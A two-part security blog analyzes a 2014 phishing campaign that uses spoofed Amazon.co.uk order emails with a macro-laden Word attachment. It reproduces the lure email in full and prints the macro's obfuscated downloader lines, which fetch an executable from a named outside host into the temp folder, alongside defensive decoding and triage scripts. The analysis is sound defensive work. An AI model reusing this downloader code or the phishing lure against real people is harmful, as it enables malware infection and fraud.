Wednesday, November 19, 2014

Amazon Order Confirmation Phishing Campaign - Part II

In the last post I reviewed a phishing campaign that used spoofed Amazon.co.uk confirmation emails to bait recipients into opening a Word doc attachment. This attachment contained a malicious macro that downloads malware onto the host system. Now we are going to look a bit deeper by performing some static analysis on the document and on the malware that it loads onto the host. Doing so will give us some insight into the nature of these files, beyond the fact that they are malicious, and into what we can expect them to do once they are executed.

Word Attachment

Let us take a look at the .doc file that is attached to the email. Upon opening the file, we notice that it is completely blank. We do receive a warning about enabling macros, however.

Since we only want to analyze this file, there is no need to enable the macros; we only want to view them. I personally decided to use the Microsoft VBS editor that comes with Microsoft Office to analyze the code. The code can be found here at Pastebin and contains a lot of dead code, such as conditional statements that can never execute. This is likely a form of obfuscation the author used to throw off anyone reading the actual VBScript.

After wading through the obfuscation, we find what appear to be the relevant lines of code.

Function SICJGWUTEZO(ByVal IYDOISAYNTH As String, ByVal PAUINJYOMZI As String) As Boolean
    Dim JGNEZQPKOWX As Object, ZSIJJVHVMOQ As Long, LSCOYILUQNP As Long, _
        APXADSKJDFK() As Byte
    Set JGNEZQPKOWX = CreateObject("MSXML2.XMLHTTP")
    JGNEZQPKOWX.Open "GET", IYDOISAYNTH, False
    JGNEZQPKOWX.SEND "send REQUEST"

The code snippet above shows an outbound HTTP GET request to a remote host. The only problem is that we don't yet know what the remote host is. The variable 'IYDOISAYNTH' holds the URL here, and it is a parameter of the function 'SICJGWUTEZO'. The function is called in only one place:

    SICJGWUTEZO ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(103) & ChrW(97) & ChrW(114) & ChrW(102) & ChrW(105) & ChrW(101) & ChrW(108) & ChrW(100) & ChrW(54) & ChrW(55) & ChrW(46) & ChrW(100) & ChrW(101) & ChrW(47) & ChrW(49) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101), Environ("TEMP") & "\SUVCKSGZTGK.exe"

Decoding the ChrW values reveals http//garfield67.de/1.exe as the resource the HTTP GET request fetches. That is very interesting but not all that surprising. Running the address through VirusTotal produces a detection rate of 16/61.
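Decoding one ChrW() chain by hand is fine, but macros like this scatter many of them through the dead code. The Python script below is an added example written for this post, not code from the macro or from the original article: it finds every run of Chr/ChrW/Chr$ calls joined with VBA's `&` operator, decodes each run into the string it builds, and can rewrite the macro source with the literal inlined so the call site reads plainly. The sample input is the single call line quoted above, re-typed here; the function names are my own, and the recovered URL is defanged before it is printed so it can be pasted into a report.

```python
import re

# The one macro line quoted in the post, reproduced here as sample input.
SAMPLE_LINE = (
    "SICJGWUTEZO ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & "
    "ChrW(47) & ChrW(47) & ChrW(103) & ChrW(97) & ChrW(114) & ChrW(102) & "
    "ChrW(105) & ChrW(101) & ChrW(108) & ChrW(100) & ChrW(54) & ChrW(55) & "
    "ChrW(46) & ChrW(100) & ChrW(101) & ChrW(47) & ChrW(49) & ChrW(46) & "
    'ChrW(101) & ChrW(120) & ChrW(101), Environ("TEMP") & "\\SUVCKSGZTGK.exe"'
)

# One Chr(n) / ChrW(n) / Chr$(n) call; the group captures the code point.
CHR_CALL = r"Chr[W$]?\(\s*(\d+)\s*\)"
# A maximal run of such calls glued together with VBA's '&' operator.
CHR_RUN = re.compile(rf"{CHR_CALL}(?:\s*&\s*{CHR_CALL})*")


def decode_run(run_text: str) -> str:
    """Turn 'ChrW(104) & ChrW(116)' into the string it builds ('ht')."""
    codes = re.findall(CHR_CALL, run_text)
    return "".join(chr(int(c)) for c in codes)


def extract_strings(vba_source: str) -> list:
    """Every string assembled from Chr* calls anywhere in the source."""
    return [decode_run(m.group(0)) for m in CHR_RUN.finditer(vba_source)]


def inline_literals(vba_source: str) -> str:
    """Replace each Chr* run with an equivalent VBA string literal
    (VBA escapes a quote inside a literal by doubling it)."""
    def to_literal(m):
        return '"' + decode_run(m.group(0)).replace('"', '""') + '"'
    return CHR_RUN.sub(to_literal, vba_source)


def defang(s: str) -> str:
    """Make a recovered URL safe to paste into a report."""
    return s.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    for s in extract_strings(SAMPLE_LINE):
        print("recovered:", defang(s))
    print("rewritten:", inline_literals(SAMPLE_LINE).replace("http", "hxxp"))
```

Running the whole Pastebin dump through extract_strings() instead of the single line would list every string the macro hides this way, which is usually the fastest way to find the download URL and drop path in a macro of this style.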

We need to analyze this file if we want to determine how it will modify the host system. While the macro provides a great deal of information, it is essentially just the means of infecting the system.

1.exe

I should start this section by stating that the executable is no longer available at that address. At some point it was taken down, which is not surprising: servers hosting malicious content don't tend to last all that long.

The first thing we are going to do is determine whether this file is actually an executable. It is not uncommon for malicious files to have extensions that differ from their actual file type. This doesn't look like such a case, but let's do our due diligence anyway.

Everything here indicates that this is indeed an executable file. The file command says so, and as we would expect the 'MZ' value is found at the beginning of the hex dump. Running strings does not yield any obviously useful information such as hard-coded IP addresses or credentials. One valuable piece of information we can extract from the strings output, however, is the list of DLL libraries the executable imports. This can also be done with a tool like IDA Pro, but for brevity the strings output is as follows:

A little Googling reveals that the majority of these libraries are used for network-based communications. This indicates that the malware has networking capabilities and will attempt to reach out to remote hosts. More digging into the binary is needed before we can accurately identify how this malware communicates. That will require some more advanced analysis techniques and will be the subject of our next post.
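The three checks in this section (is the file really a PE executable, what does its header say, and which DLL names appear in its strings) can be scripted so that every downloaded sample gets the same first-look triage. The script below is an added example, not code from the post. Because 1.exe is no longer available, it builds a small constructed byte string with a valid MZ/PE header and a few DLL names in place of the real binary; the DLL names in that sample are invented for the demonstration and are not the post's strings output. Function names are my own.

```python
import re
import struct

# IMAGE_FILE_HEADER.Machine values for the two common Windows targets.
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64"}
# A strings(1)-style scan for anything that looks like a DLL name.
DLL_NAME = re.compile(rb"[A-Za-z0-9_\-]{1,40}\.dll", re.IGNORECASE)


def pe_signature_offset(data: bytes):
    """Return the offset of the 'PE\\0\\0' signature, or None if this is not
    a well-formed MZ/PE file. e_lfanew lives at 0x3C in the DOS header and
    points at the NT headers; a renamed script or image fails this check."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return e_lfanew


def dll_names(data: bytes) -> list:
    """Lower-cased, de-duplicated DLL names found anywhere in the bytes.
    Like the post's strings output this reads the whole file rather than
    walking the import directory, so a packed sample can hide its imports
    until it is unpacked; an empty list is a hint, not a verdict."""
    found = {m.group(0).decode("ascii").lower() for m in DLL_NAME.finditer(data)}
    return sorted(found)


def triage(data: bytes) -> dict:
    """Summarise the checks a first look at a suspected executable should do."""
    result = {"mz": data[:2] == b"MZ", "pe": False, "machine": None, "dlls": []}
    off = pe_signature_offset(data)
    if off is not None:
        result["pe"] = True
        (machine,) = struct.unpack_from("<H", data, off + 4)  # Machine field
        result["machine"] = MACHINE_NAMES.get(machine, hex(machine))
    result["dlls"] = dll_names(data)
    return result


def build_sample() -> bytes:
    """Constructed stand-in for a downloaded binary: a DOS header whose
    e_lfanew points at a PE signature for an x86 image, followed by a few
    DLL names such as a strings scan would reveal. Names are invented."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> 0x40
    nt = b"PE\0\0" + struct.pack("<H", 0x014C) + b"\0" * 18
    strings = b"\0KERNEL32.dll\0WS2_32.dll\0WININET.dll\0\xff\xfe"
    return bytes(dos) + nt + strings


if __name__ == "__main__":
    for label, blob in [("sample", build_sample()),
                        ("not-a-pe", b"#!/bin/sh\necho hi\n")]:
        print(label, triage(blob))
```

The second input is a shell script masquerading as an executable; triage() reports it as neither MZ nor PE, which is exactly the mismatch between extension and content that the due-diligence check above is looking for.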

Part One
Part Three

Wednesday, November 12, 2014

Amazon Order Confirmation Phishing Campaign

Recently a new phishing campaign has been brought to my attention. I have been noticing a high number of hosts downloading executables. This activity causes Snort-based signatures to fire when the downloads are attempted. After a little investigation, I found that a good number of people are receiving phishing emails that contain an attachment. This attachment appears to be the stimulus for the downloads we are observing.

Some Google searching returns a number of articles about this ongoing campaign. My Online Security provides the actual email that is being distributed to potential victims.

Examining the email, it appears to be legitimate, but there are a few key indications that something is wrong. The most noticeable indication is the broken English in the email.
Dear Customer,
Greetings from Amazon.co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http://www.amazon.co.uk/your-account
Your order #203-2083868-0173124 (received October 30, 2014)

Your right to cancel: At Amazon.co.uk we want you to be delighted every time you shop with us. Occasionally though, we know you may want to return items. Read more about our Returns Policy at: http://www.amazon.co.uk/returns-policy/
Further, under the United Kingdom's Distance Selling Regulations, you have the right to cancel the contract for the purchase of any of these items within a period of 7 working days, beginning with the day after the day on which the item is delivered. This applies to all of our products. However, we regret that we cannot accept cancellations of contracts for the purchase of video, DVD, audio, video games and software products where the item has been unsealed. Please note that we are unable to accept cancellation of, or returns for, digital items once downloading has commenced. Otherwise, we can accept returns of complete product, which is unused and in an "as new" condition.
Our Returns Support Centre will guide you through our Returns Policy and, where relevant, provide you with a printable personalised return label. Please go to http://www.amazon.co.uk/returns-support to use our Returns Support Centre.
To cancel this contract, please pack the relevant item securely, attach your personalised return label and send it to us with the delivery slip so that we receive it within 7 working days after the day of the date that the item was delivered to you or, in the case of large items delivered by our specialist couriers, contact Amazon.co.uk customer services using the link below within 7 working days after the date that the item was delivered to you to discuss the return.
https://www.amazon.co.uk/gp/css/returns/homepage.html
For your protection, where you are returning an item to us, we recommend that you use a recorded-delivery service. Please note that you will be responsible for the costs of returning the goods to us unless we delivered the item to you in error or the item is faulty. If we do not receive the item back from you, we may arrange for collection of the item from your residence at your cost. You should be aware that, once we begin the delivery process, you will not be able to cancel any contract you have with us for services carried out by us (e.g. gift wrapping).
Please also note that you will be responsible for the costs of collection in the event that our specialist courier service collect a large item from you to return to us.
As soon as we receive notice of your cancellation of this order, we will refund the relevant part of the purchase price for that item.
Should you have any questions, feel free to visit our online Help Desk at: http://www.amazon.co.uk/help
If you've explored the above links but still need to get in touch with us, you will find more contact details at the online Help Desk.
Note: this e-mail was sent from a notification-only e-mail address that cannot accept incoming e-mail. Please do not reply to this message.
Thank you for shopping at Amazon.co.uk
-------------------------------------------------
Amazon EU S.à.r.L.
c/o Marston Gate
Ridgmont, BEDFORD MK43 0XP
United Kingdom
-------------------------------------------------
I will admit that I can't honestly remember the last time I actually read a confirmation email after making a purchase on Amazon. To me, this suggests it is quite conceivable that an unsuspecting recipient would not recognize this as a phishing attempt. I can also say that I have never received a confirmation email with an attachment. This email, however, has an attached Microsoft Word document.

This .doc file (md5: a75e196e6c0cabc145f4cdc3177e66ec) contains a macro that causes the system it is opened on to make download requests. The intent is that the recipient will open the document, disable the macro security features presented when the file is opened, and thereby execute the VB script. It is common for an unsuspecting user to click past warnings in documents such as these, and the perpetrators are very aware of this.

This macro downloads the file "1.exe" (md5: 954858bc0f115a4d6442afb333ec44c2) onto the host system. Once this file is executed...well, let's just say all sorts of fun things begin to happen, which we will explore further in the following posts. Running this executable through VirusTotal produces a detection rate of 35/54. The vendor classifications repeatedly use the name "Yakes" for this malware.

In the following posts I will analyze the downloaded malware, the Word document and any additional files that may be dropped onto the host system. Performing these steps will hopefully lead to additional information such as the origin of the campaign and the purpose of the malware.

Part Two
Part Three